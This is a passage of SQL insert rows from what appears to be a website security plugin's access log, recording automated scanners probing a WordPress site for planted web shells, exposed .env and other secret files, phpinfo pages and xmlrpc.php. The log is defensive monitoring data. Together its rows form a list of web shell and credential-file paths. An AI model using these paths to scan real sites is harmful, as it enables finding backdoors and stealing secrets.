00:07:22'),(8358,'https://amb18b.com/item.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:24','2025-11-20 00:07:24'),(8359,'https://amb18b.com/plugins/Cache/footer.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:26','2025-11-20 00:07:26'),(8360,'https://amb18b.com/mail.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:30','2025-11-20 00:07:30'),(8361,'https://amb18b.com/sx.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:32','2025-11-20 00:07:32'),(8362,'https://amb18b.com/wp-admin/maint/admin.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:34','2025-11-20 00:07:34'),(8363,'https://amb18b.com/link.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:43','2025-11-20 00:07:43'),(8364,'https://amb18b.com/byp.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:45','2025-11-20 00:07:45'),(8365,'https://amb18b.com/bak.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:47','2025-11-20 00:07:47'),(8366,'https://amb18b.com/ini.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:49','2025-11-20 00:07:49'),(8367,'https://amb18b.com/ws.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:51','2025-11-20 00:07:51'),(8368,'https://amb18b.com/wp-trackback.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:53','2025-11-20 00:07:53'),(8369,'https://amb18b.com/.well-known/index.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:54','2025-11-20 00:07:54'),(8370,'https://amb18b.com/wp-includes/certificates/plugins.php','51.103.74.100','Direct Access',1,'2025-11-20 00:07:56','2025-11-20 00:07:56'),(8371,'https://amb18b.com/gmo.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:04','2025-11-20 00:08:04'),(8372,'https://amb18b.com/wp-includes/ID3/about.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:05','2025-11-20 00:08:05'),(8373,'https://amb18b.com/css/index.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:07','2025-11-20 00:08:07'),(8374,'https://amb18b.com/wp-admin/includes/xmrlpc.php?p=','51.103.74.100','Direct Access',1,'2025-11-20 00:08:08','2025-11-20 00:08:08'),(8375,'https://amb18b.com/wp-includes/SimplePie/wp-login.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:10','2025-11-20 00:08:10'),(8376,'https://amb18b.com/filemanager/dialog.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:13','2025-11-20 00:08:13'),(8377,'https://amb18b.com/wp-admin/maint/index.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:15','2025-11-20 00:08:15'),(8378,'https://amb18b.com/wp-includes/Requests/Text/admin.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:17','2025-11-20 00:08:17'),(8379,'https://amb18b.com/wp-includes/customize/about.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:20','2025-11-20 00:08:20'),(8380,'https://amb18b.com/index/function.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:22','2025-11-20 00:08:22'),(8381,'https://amb18b.com/uploads/autoload_classmap.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:23','2025-11-20 00:08:23'),(8382,'https://amb18b.com/wp-includes/css/dist/preferences/wp-login.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:25','2025-11-20 00:08:25'),(8383,'https://amb18b.com/wp-includes/style-engine/about.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:26','2025-11-20 00:08:26'),(8384,'https://amb18b.com/.well-known/acme-challenge/mariju.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:29','2025-11-20 00:08:29'),(8385,'https://amb18b.com/about/function.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:30','2025-11-20 00:08:30'),(8386,'https://amb18b.com/wp-includes/theme-compat/chosen.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:32','2025-11-20 00:08:32'),(8387,'https://amb18b.com/admin/function.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:34','2025-11-20 00:08:34'),(8388,'https://amb18b.com/.well-known/acme-challenge/index.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:36','2025-11-20 00:08:36'),(8389,'https://amb18b.com/css/colors/blue/index.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:37','2025-11-20 00:08:37'),(8390,'https://amb18b.com/wp-admin/setup-config.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:41','2025-11-20 00:08:41'),(8391,'https://amb18b.com/wp-admin/js/index.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:45','2025-11-20 00:08:45'),(8392,'https://amb18b.com/wp-includes/assets/index.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:48','2025-11-20 00:08:48'),(8393,'https://amb18b.com/wp-includes/fonts/index.php?p=','51.103.74.100','Direct Access',1,'2025-11-20 00:08:52','2025-11-20 00:08:52'),(8394,'https://amb18b.com/.well-known/gecko-litespeed.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:53','2025-11-20 00:08:53'),(8395,'https://amb18b.com/.well-known/admin.php','51.103.74.100','Direct Access',1,'2025-11-20 00:08:55','2025-11-20 00:08:55'),(8396,'https://amb18b.com/.well-known/log.php','51.103.74.100','Direct Access',1,'2025-11-20 00:09:02','2025-11-20 00:09:02'),(8397,'https://amb18b.com/class.php','51.103.74.100','Direct Access',1,'2025-11-20 00:09:04','2025-11-20 00:09:04'),(8398,'https://amb18b.com/bless.php','51.103.74.100','Direct Access',1,'2025-11-20 00:09:06','2025-11-20 00:09:06'),(8399,'https://amb18b.com/wp-includes/js/codemirror/index.php','51.103.74.100','Direct Access',1,'2025-11-20 00:09:07','2025-11-20 00:09:07'),(8400,'https://amb18b.com/wp-includes/block-patterns/index.php','51.103.74.100','Direct Access',1,'2025-11-20 00:09:09','2025-11-20 00:09:09'),(8401,'https://amb18b.com/lock360.php','51.103.74.100','Direct Access',1,'2025-11-20 00:09:11','2025-11-20 00:09:11'),(8402,'https://amb18b.com/bge.php','51.103.74.100','Direct Access',1,'2025-11-20 00:09:13','2025-11-20 00:09:13'),(8403,'https://amb18b.com/ifm.php','51.103.74.100','Direct Access',1,'2025-11-20 00:09:15','2025-11-20 00:09:15'),(8404,'https://amb18b.com/kairolin.php','51.103.74.100','Direct Access',1,'2025-11-20 00:09:43','2025-11-20 00:09:43'),(8405,'https://amb18b.com/siln.php','51.103.74.100','Direct Access',1,'2025-11-20 00:09:47','2025-11-20 00:09:47'),(8406,'https://amb18b.com/xmlrpc.php','8.218.212.177','Direct Access',1,'2025-11-20 00:27:10','2025-11-20 00:27:10'),(8407,'https://amb18b.com/?p=16','2a03:2880:f800:13::','Direct Access',1,'2025-11-20 00:33:42','2025-11-20 00:33:42'),(8408,'https://amb18b.com/xmlrpc.php','2603:3:610f:6180::','Direct Access',1,'2025-11-20 01:42:33','2025-11-20 01:42:33'),(8409,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','51.103.74.100','Invalid Referrer',1,'2025-11-20 01:49:23','2025-11-20 01:49:23'),(8410,'https://amb18b.com/wp-plain.php','51.103.74.100','Invalid Referrer',1,'2025-11-20 01:49:23','2025-11-20 01:49:23'),(8411,'https://amb18b.com/','51.103.74.100','Invalid Referrer',2,'2025-11-20 01:49:26','2025-11-20 01:49:25'),(8412,'https://amb18b.com/alfacgiapi/perl.alfa','51.103.74.100','Invalid Referrer',1,'2025-11-20 01:49:27','2025-11-20 01:49:27'),(8413,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','51.103.74.100','Direct Access',1,'2025-11-20 01:49:29','2025-11-20 01:49:29'),(8414,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','51.103.74.100','Direct Access',1,'2025-11-20 01:49:32','2025-11-20 01:49:32'),(8415,'https://amb18b.com/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:02','2025-11-20 03:18:02'),(8416,'https://amb18b.com/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:02','2025-11-20 03:18:02'),(8417,'https://amb18b.com/sendgrid.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:06','2025-11-20 03:18:06'),(8418,'https://amb18b.com/twilio.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:07','2025-11-20 03:18:07'),(8419,'https://amb18b.com/api/.env','78.153.140.195','Direct Access',2,'2025-11-20 03:18:30','2025-11-20 03:18:08'),(8420,'https://amb18b.com/phpinfo/','78.153.140.195','Direct Access',1,'2025-11-20 03:18:09','2025-11-20 03:18:09'),(8421,'https://amb18b.com/sendgrid.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:09','2025-11-20 03:18:09'),(8422,'https://amb18b.com/dev/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:10','2025-11-20 03:18:10'),(8423,'https://amb18b.com/twilio.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:11','2025-11-20 03:18:11'),(8424,'https://amb18b.com/app_dev.php/_profiler/phpinfo','78.153.140.195','Direct Access',1,'2025-11-20 03:18:11','2025-11-20 03:18:11'),(8425,'https://amb18b.com/api/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:12','2025-11-20 03:18:12'),(8426,'https://amb18b.com/admin/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:13','2025-11-20 03:18:13'),(8427,'https://amb18b.com/phpinfo/','78.153.140.195','Direct Access',1,'2025-11-20 03:18:13','2025-11-20 03:18:13'),(8428,'https://amb18b.com/laravel/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:14','2025-11-20 03:18:14'),(8429,'https://amb18b.com/dev/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:14','2025-11-20 03:18:14'),(8430,'https://amb18b.com/.config.yaml','78.153.140.195','Direct Access',1,'2025-11-20 03:18:15','2025-11-20 03:18:15'),(8431,'https://amb18b.com/app_dev.php/_profiler/phpinfo','78.153.140.195','Direct Access',1,'2025-11-20 03:18:16','2025-11-20 03:18:16'),(8432,'https://amb18b.com/backend/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:16','2025-11-20 03:18:16'),(8433,'https://amb18b.com/secrets.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:17','2025-11-20 03:18:17'),(8434,'https://amb18b.com/admin/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:17','2025-11-20 03:18:17'),(8435,'https://amb18b.com/.env.example','78.153.140.195','Direct Access',1,'2025-11-20 03:18:18','2025-11-20 03:18:18'),(8436,'https://amb18b.com/web/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:19','2025-11-20 03:18:19'),(8437,'https://amb18b.com/laravel/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:19','2025-11-20 03:18:19'),(8438,'https://amb18b.com/.env.bak','78.153.140.195','Direct Access',1,'2025-11-20 03:18:20','2025-11-20 03:18:20'),(8439,'https://amb18b.com/.config.yaml','78.153.140.195','Direct Access',1,'2025-11-20 03:18:21','2025-11-20 03:18:21'),(8440,'https://amb18b.com/staging/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:22','2025-11-20 03:18:22'),(8441,'https://amb18b.com/backend/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:23','2025-11-20 03:18:23'),(8442,'https://amb18b.com/debug/default/view?panel=config','78.153.140.195','Direct Access',1,'2025-11-20 03:18:23','2025-11-20 03:18:23'),(8443,'https://amb18b.com/secrets.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:24','2025-11-20 03:18:24'),(8444,'https://amb18b.com/core/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:24','2025-11-20 03:18:24'),(8445,'https://amb18b.com/.env.example','78.153.140.195','Direct Access',1,'2025-11-20 03:18:25','2025-11-20 03:18:25'),(8446,'https://amb18b.com/phpinfo.php','78.153.140.195','Direct Access',1,'2025-11-20 03:18:25','2025-11-20 03:18:25'),(8447,'https://amb18b.com/info/','78.153.140.195','Direct Access',1,'2025-11-20 03:18:26','2025-11-20 03:18:26'),(8448,'https://amb18b.com/web/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:26','2025-11-20 03:18:26'),(8449,'https://amb18b.com/images/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:27','2025-11-20 03:18:27'),(8450,'https://amb18b.com/.env.save.1','78.153.140.195','Direct Access',1,'2025-11-20 03:18:28','2025-11-20 03:18:28'),(8451,'https://amb18b.com/.env.bak','78.153.140.195','Direct Access',1,'2025-11-20 03:18:28','2025-11-20 03:18:28'),(8452,'https://amb18b.com/.env.save','78.153.140.195','Direct Access',1,'2025-11-20 03:18:29','2025-11-20 03:18:29'),(8453,'https://amb18b.com/staging/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:30','2025-11-20 03:18:30'),(8454,'https://amb18b.com/debug/default/view?panel=config','78.153.140.195','Direct Access',1,'2025-11-20 03:18:31','2025-11-20 03:18:31'),(8455,'https://amb18b.com/app/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:32','2025-11-20 03:18:32'),(8456,'https://amb18b.com/test','78.153.140.195','Direct Access',1,'2025-11-20 03:18:33','2025-11-20 03:18:33'),(8457,'https://amb18b.com/core/.env','78.153.140.195','Direct Access',1,'2025-11-20 03:18:34','2025-11-20 03:18:34'),(8458,'https://amb18b.com/xmlrpc.php','196.189.155.34','Direct Access',1,'2025-11-20 04:29:25','2025-11-20 04:29:25'),(8459,'https://amb18b.com/xmlrpc.php','27.74.251.194','Direct Access',1,'2025-11-20 05:57:24','2025-11-20 05:57:24'),(8460,'https://amb18b.com/.env','78.153.140.218','Direct Access',1,'2025-11-20 06:43:23','2025-11-20 06:43:23'),(8461,'https://amb18b.com/sendgrid.env','78.153.140.218','Direct Access',1,'2025-11-20 06:43:28','2025-11-20 06:43:28'),(8462,'https://amb18b.com/twilio.env','78.153.140.218','Direct Access',1,'2025-11-20 06:43:30','2025-11-20 06:43:30'),(8463,'https://amb18b.com/api/.env','78.153.140.218','Direct Access',1,'2025-11-20 06:43:31','2025-11-20 06:43:31'),(8464,'https://amb18b.com/phpinfo/','78.153.140.218','Direct Access',1,'2025-11-20 06:43:33','2025-11-20 06:43:33'),(8465,'https://amb18b.com/dev/.env','78.153.140.218','Direct Access',1,'2025-11-20 06:43:34','2025-11-20 06:43:34'),(8466,'https://amb18b.com/app_dev.php/_profiler/phpinfo','78.153.140.218','Direct Access',1,'2025-11-20 06:43:35','2025-11-20 06:43:35'),(8467,'https://amb18b.com/admin/.env','78.153.140.218','Direct Access',1,'2025-11-20 06:43:37','2025-11-20 06:43:37'),(8468,'https://amb18b.com/media/system/js/core.js','34.63.82.223','Direct Access',1,'2025-11-20 07:29:34','2025-11-20 07:29:34'),(8469,'https://amb18b.com/xmlrpc.php','50.6.174.16','Direct Access',1,'2025-11-20 07:37:57','2025-11-20 07:37:57'),(8470,'https://amb18b.com//wp-includes/wlwmanifest.xml','208.84.101.154','Direct Access',1,'2025-11-20 08:58:30','2025-11-20 08:58:30'),(8471,'https://amb18b.com//xmlrpc.php?rsd','208.84.101.154','Direct Access',1,'2025-11-20 08:58:30','2025-11-20 08:58:30'),(8472,'https://amb18b.com//?author=2','208.84.101.154','Direct Access',1,'2025-11-20 08:58:32','2025-11-20 08:58:32'),(8473,'https://amb18b.com//xmlrpc.php','208.84.101.154','Direct Access',1,'2025-11-20 08:58:34','2025-11-20 08:58:34'),(8474,'https://amb18b.com/xmlrpc.php','27.74.251.194','Direct Access',1,'2025-11-20 09:23:41','2025-11-20 09:23:41'),(8475,'https://amb18b.com/class-t.api.php','172.161.90.19','Direct Access',1,'2025-11-20 09:26:37','2025-11-20 09:26:37'),(8476,'https://amb18b.com/zwso.php','172.161.90.19','Direct Access',1,'2025-11-20 09:26:39','2025-11-20 09:26:39'),(8477,'https://amb18b.com/wp-admin/css/colors/blue/index.php','172.161.90.19','Direct Access',1,'2025-11-20 09:26:44','2025-11-20 09:26:44'),(8478,'https://amb18b.com/admin.php?p=','172.161.90.19','Direct Access',1,'2025-11-20 09:26:46','2025-11-20 09:26:46'),(8479,'https://amb18b.com/.well-known/acme-challenge/install.php','172.161.90.19','Direct Access',1,'2025-11-20 09:26:48','2025-11-20 09:26:48'),(8480,'https://amb18b.com/mpvloi.php','172.161.90.19','Direct Access',1,'2025-11-20 09:26:50','2025-11-20 09:26:50'),(8481,'https://amb18b.com/wp-includes/0.php','172.161.90.19','Direct Access',1,'2025-11-20 09:26:52','2025-11-20 09:26:52'),(8482,'https://amb18b.com/randkeyword.php','172.161.90.19','Direct Access',1,'2025-11-20 09:26:53','2025-11-20 09:26:53'),(8483,'https://amb18b.com/fwe.php','172.161.90.19','Direct Access',1,'2025-11-20 09:26:55','2025-11-20 09:26:55'),(8484,'https://amb18b.com/wp-includes/cs.php','172.161.90.19','Direct Access',1,'2025-11-20 09:26:57','2025-11-20 09:26:57'),(8485,'https://amb18b.com/wikindex.php','172.161.90.19','Direct Access',1,'2025-11-20 09:26:58','2025-11-20 09:26:58'),(8486,'https://amb18b.com/images/m.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:00','2025-11-20 09:27:00'),(8487,'https://amb18b.com/wp-includes/css/kses.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:01','2025-11-20 09:27:01'),(8488,'https://amb18b.com/jagoan.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:03','2025-11-20 09:27:03'),(8489,'https://amb18b.com/images/g3.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:05','2025-11-20 09:27:05'),(8490,'https://amb18b.com/.well-known/zaza.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:06','2025-11-20 09:27:06'),(8491,'https://amb18b.com/.well-known/acme-challenge/myip.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:08','2025-11-20 09:27:08'),(8492,'https://amb18b.com/htaccess.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:10','2025-11-20 09:27:10'),(8493,'https://amb18b.com/readme.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:11','2025-11-20 09:27:11'),(8494,'https://amb18b.com/Cok.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:13','2025-11-20 09:27:13'),(8495,'https://amb18b.com/hob.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:14','2025-11-20 09:27:14'),(8496,'https://amb18b.com/kal.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:16','2025-11-20 09:27:16'),(8497,'https://amb18b.com/fv.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:18','2025-11-20 09:27:18'),(8498,'https://amb18b.com/lx.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:19','2025-11-20 09:27:19'),(8499,'https://amb18b.com/w1w.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:21','2025-11-20 09:27:21'),(8500,'https://amb18b.com/Contrller.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:22','2025-11-20 09:27:22'),(8501,'https://amb18b.com/cafe.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:24','2025-11-20 09:27:24'),(8502,'https://amb18b.com/ww2.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:26','2025-11-20 09:27:26'),(8503,'https://amb18b.com/ww3.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:28','2025-11-20 09:27:28'),(8504,'https://amb18b.com/ww4.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:29','2025-11-20 09:27:29'),(8505,'https://amb18b.com/as.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:31','2025-11-20 09:27:31'),(8506,'https://amb18b.com/wsd.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:33','2025-11-20 09:27:33'),(8507,'https://amb18b.com/403.php','172.161.90.19','Direct Access',2,'2025-11-20 09:29:21','2025-11-20 09:27:34'),(8508,'https://amb18b.com/max.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:36','2025-11-20 09:27:36'),(8509,'https://amb18b.com/m.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:37','2025-11-20 09:27:37'),(8510,'https://amb18b.com/post.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:39','2025-11-20 09:27:39'),(8511,'https://amb18b.com/themes.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:40','2025-11-20 09:27:40'),(8512,'https://amb18b.com/ALFA_DATA/index.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:44','2025-11-20 09:27:44'),(8513,'https://amb18b.com/wp-admin/maint/about.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:45','2025-11-20 09:27:45'),(8514,'https://amb18b.com/wp-admin/network/wp-conflg.php?p=','172.161.90.19','Direct Access',1,'2025-11-20 09:27:47','2025-11-20 09:27:47'),(8515,'https://amb18b.com/click.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:49','2025-11-20 09:27:49'),(8516,'https://amb18b.com/install.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:51','2025-11-20 09:27:51'),(8517,'https://amb18b.com/lv.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:52','2025-11-20 09:27:52'),(8518,'https://amb18b.com/simple.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:54','2025-11-20 09:27:54'),(8519,'https://amb18b.com/13k.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:55','2025-11-20 09:27:55'),(8520,'https://amb18b.com/css.php','172.161.90.19','Direct Access',2,'2025-11-20 09:28:26','2025-11-20 09:27:57'),(8521,'https://amb18b.com/yellow.php','172.161.90.19','Direct Access',1,'2025-11-20 09:27:59','2025-11-20 09:27:59'),(8522,'https://amb18b.com/cong.php','172.161.90.19','Direct Access',2,'2025-11-20 09:28:12','2025-11-20 09:28:01'),(8523,'https://amb18b.com/fw.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:02','2025-11-20 09:28:02'),(8524,'https://amb18b.com/bs1.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:04','2025-11-20 09:28:04'),(8525,'https://amb18b.com/wp-includes/images/wp-login.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:07','2025-11-20 09:28:07'),(8526,'https://amb18b.com/termps.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:09','2025-11-20 09:28:09'),(8527,'https://amb18b.com/co.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:11','2025-11-20 09:28:11'),(8528,'https://amb18b.com/atomlib.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:14','2025-11-20 09:28:14'),(8529,'https://amb18b.com/w.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:16','2025-11-20 09:28:16'),(8530,'https://amb18b.com/404.php','172.161.90.19','Direct Access',2,'2025-11-20 09:29:09','2025-11-20 09:28:18'),(8531,'https://amb18b.com/ioxi-o.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:19','2025-11-20 09:28:19'),(8532,'https://amb18b.com/0x.php','172.161.90.19','Direct Access',2,'2025-11-20 09:28:41','2025-11-20 09:28:24'),(8533,'https://amb18b.com/222.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:28','2025-11-20 09:28:28'),(8534,'https://amb18b.com/1.php','172.161.90.19','Direct Access',2,'2025-11-20 09:29:19','2025-11-20 09:28:30'),(8535,'https://amb18b.com/admin.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:32','2025-11-20 09:28:32'),(8536,'https://amb18b.com/wp-admin/maint/maint.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:33','2025-11-20 09:28:33'),(8537,'https://amb18b.com/classwithtostring.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:35','2025-11-20 09:28:35'),(8538,'https://amb18b.com/abcd.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:37','2025-11-20 09:28:37'),(8539,'https://amb18b.com/dropdown.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:38','2025-11-20 09:28:38'),(8540,'https://amb18b.com/moon.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:40','2025-11-20 09:28:40'),(8541,'https://amb18b.com/moon.php?p=','172.161.90.19','Direct Access',1,'2025-11-20 09:28:43','2025-11-20 09:28:43'),(8542,'https://amb18b.com/autoload_classmap.php?p=','172.161.90.19','Direct Access',1,'2025-11-20 09:28:45','2025-11-20 09:28:45'),(8543,'https://amb18b.com/inputs.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:46','2025-11-20 09:28:46'),(8544,'https://amb18b.com/default.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:48','2025-11-20 09:28:48'),(8545,'https://amb18b.com/fm.php?p=','172.161.90.19','Direct Access',1,'2025-11-20 09:28:49','2025-11-20 09:28:49'),(8546,'https://amb18b.com/about.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:51','2025-11-20 09:28:51'),(8547,'https://amb18b.com/alfa.php','172.161.90.19','Direct Access',2,'2025-11-20 09:29:17','2025-11-20 09:28:53'),(8548,'https://amb18b.com/buy.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:54','2025-11-20 09:28:54'),(8549,'https://amb18b.com/themes/twentytwentytwo/index.php','172.161.90.19','Direct Access',1,'2025-11-20 09:28:56','2025-11-20 09:28:56'),(8550,'https://amb18b.com/wp-admin/js/wp-conflg.php?p=','172.161.90.19','Direct Access',1,'2025-11-20 09:28:58','2025-11-20 09:28:58'),(8551,'https://amb18b.com/wp-admin/wp-conflg.php?p=','172.161.90.19','Direct Access',1,'2025-11-20 09:28:59','2025-11-20 09:28:59'),(8552,'https://amb18b.com/wp-admin/css/wp-conflg.php?p=','172.161.90.19','Direct Access',1,'2025-11-20 09:29:01','2025-11-20 09:29:01'),(8553,'https://amb18b.com/manager.php?p=','172.161.90.19','Direct Access',1,'2025-11-20 09:29:02','2025-11-20 09:29:02'),(8554,'https://amb18b.com/js/fm.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:04','2025-11-20 09:29:04'),(8555,'https://amb18b.com/item.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:06','2025-11-20 09:29:06'),(8556,'https://amb18b.com/plugins/Cache/footer.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:07','2025-11-20 09:29:07'),(8557,'https://amb18b.com/mail.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:10','2025-11-20 09:29:10'),(8558,'https://amb18b.com/sx.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:12','2025-11-20 09:29:12'),(8559,'https://amb18b.com/wp-admin/maint/admin.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:14','2025-11-20 09:29:14'),(8560,'https://amb18b.com/article.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:16','2025-11-20 09:29:16'),(8561,'https://amb18b.com/link.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:23','2025-11-20 09:29:23'),(8562,'https://amb18b.com/byp.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:24','2025-11-20 09:29:24'),(8563,'https://amb18b.com/ws.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:26','2025-11-20 09:29:26'),(8564,'https://amb18b.com/wp-trackback.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:28','2025-11-20 09:29:28'),(8565,'https://amb18b.com/.well-known/index.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:29','2025-11-20 09:29:29'),(8566,'https://amb18b.com/wp-includes/certificates/plugins.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:31','2025-11-20 09:29:31'),(8567,'https://amb18b.com/gmo.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:38','2025-11-20 09:29:38'),(8568,'https://amb18b.com/wp-includes/ID3/about.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:40','2025-11-20 09:29:40'),(8569,'https://amb18b.com/css/index.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:41','2025-11-20 09:29:41'),(8570,'https://amb18b.com/wp-admin/includes/xmrlpc.php?p=','172.161.90.19','Direct Access',1,'2025-11-20 09:29:43','2025-11-20 09:29:43'),(8571,'https://amb18b.com/wp-includes/SimplePie/wp-login.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:45','2025-11-20 09:29:45'),(8572,'https://amb18b.com/filemanager/dialog.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:48','2025-11-20 09:29:48'),(8573,'https://amb18b.com/wp-admin/maint/index.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:50','2025-11-20 09:29:50'),(8574,'https://amb18b.com/wp-includes/Requests/Text/admin.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:52','2025-11-20 09:29:52'),(8575,'https://amb18b.com/wp-includes/customize/about.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:53','2025-11-20 09:29:53'),(8576,'https://amb18b.com/index/function.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:55','2025-11-20 09:29:55'),(8577,'https://amb18b.com/uploads/autoload_classmap.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:57','2025-11-20 09:29:57'),(8578,'https://amb18b.com/wp-includes/css/dist/preferences/wp-login.php','172.161.90.19','Direct Access',1,'2025-11-20 09:29:58','2025-11-20 09:29:58'),(8579,'https://amb18b.com/wp-includes/style-engine/about.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:00','2025-11-20 09:30:00'),(8580,'https://amb18b.com/ww1.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:02','2025-11-20 09:30:02'),(8581,'https://amb18b.com/qqq.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:03','2025-11-20 